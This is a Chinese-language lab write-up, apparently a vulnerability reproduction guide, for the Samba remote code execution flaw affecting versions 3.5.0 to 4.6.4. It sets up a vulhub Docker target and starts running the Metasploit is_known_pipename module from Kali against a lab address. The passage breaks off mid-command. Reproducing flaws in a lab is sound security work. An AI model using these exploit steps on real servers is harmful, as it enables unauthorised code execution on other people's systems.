1. 漏洞描述
Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录,会导致服务器加载并执行指定的库文件。
以下Samba版本受到影响:
– 3.5.0- 4.6.4
– 3.5.0- 4.5.10
– 3.5.0- 4.4.14
2. 复现环境
靶机:使用vulhub进行环境搭建
攻击机:kali
3. 漏洞复现
1.运行测试环境
docker-compose up -d
2.使用kali msf框架
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > set rhosts 192.168.20.102
msf5 exploit(linux/samba/is